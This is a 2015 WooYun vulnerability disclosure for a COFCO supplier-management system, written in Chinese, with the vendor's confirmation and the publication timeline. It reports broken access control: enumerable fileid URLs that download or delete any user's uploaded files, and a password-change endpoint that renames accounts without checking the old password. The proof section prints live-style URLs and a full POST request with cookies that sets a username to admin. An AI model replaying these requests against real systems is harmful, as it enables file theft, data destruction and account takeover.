当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163515

漏洞标题:中粮集团某系统设计缺陷导致可下载\删除任意用户文件\帐号名称密码任意改

相关厂商:中粮集团有限公司

漏洞作者: 路人甲

提交时间:2015-12-22 16:46

修复时间:2016-02-06 10:45

公开时间:2016-02-06 10:45

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-22: 细节已通知厂商并且等待厂商处理中
2015-12-23: 厂商已经确认,细节仅向厂商公开
2016-01-02: 细节向核心白帽子及相关领域专家公开
2016-01-12: 细节向普通白帽子公开
2016-01-22: 细节向实习白帽子公开
2016-02-06: 细节向公众公开

简要描述:

设计缺陷导致可下载、删除用户资质文件,

详细说明:

地址:
http://506srm.cofco.com/FileDownLoad.aspx?fileid=20981

QQ截图20151222135227.png


参数fileid可遍历
http://506srm.cofco.com/FileDownLoad.aspx?fileid=20980

QQ截图20151222135338.png

漏洞证明:

http://506srm.cofco.com/FileDownLoad.aspx?fileid=19888

QQ截图20151222135502.png


http://506srm.cofco.com/FileDownLoad.aspx?fileid=19000

QQ截图20151222135541.png


http://506srm.cofco.com/FileDownLoad.aspx?fileid=22000

QQ截图20151222135630.png


删除
http://506srm.cofco.com/FileDeleteHandler.aspx?fileId=26988

QQ截图20151222135901.png


比如这个文档是我传的测试文档
http://506srm.cofco.com/FileDownLoad.aspx?fileId=26982
点击链接即可删除
遍历id即可删除系统所有用户上传的文件
当然还有帐号名称任意改

QQ截图20151222140140.png


我把用户名改成了admin

POST http://506srm.cofco.com/config/Pwd_Change.aspx HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://506srm.cofco.com/config/Pwd_Change.aspx
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 444
Host: 506srm.cofco.com
Pragma: no-cache
Cookie: ASP.NET_SessionId=am0knfajuyerwxwyh35ldclj; ASPSESSIONIDACRRABAT=POLBFBNDHAMPFCAJILCEPKJL; __utmc=107700230; CurrentEmplID=107834; LastLogonName=admin; Checksum=admin; UserID=7582; __utma=107700230.926922405.1450752285.1450752285.1450754437.2; __utmz=107700230.1450752285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VisitNum=1
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg4NTYyNDAwOA9kFgJmD2QWBmYPFgIeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7ZAIBDxYEHwAFDWRpc3BsYXk6bm9uZTseBXZhbHVlBQzmo4DmtYvluJDlj7dkAgIPFgIfAQUG56Gu5a6aZGQojotYyEuvFYPXfcEAHyark7tvuut4sE%2BNCVxPvRQBbQ%3D%3D&__EVENTVALIDATION=%2FwEWBALfuP2cDQKl1bKzCQLf5KzLCwKtre3mC0ouO3ROX26e%2FQw9m55MUnL%2FBvhCukbwCBzUrFwRLfKt&Userid=&txtUserName=admin&userpsw=人工打码&userpsw1=人工打码&btnConfirm=%E7%A1%AE%E5%AE%9A


我们自需要把txtUserName改为你想改的用户名即可

QQ截图20151222140401.png


用户名这样闹不会串号么,而且修改密码不验证旧密码可直接修改

修复方案:

修改程序

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-23 10:43

厂商回复:

非常感谢,马上处理!

最新状态:

暂无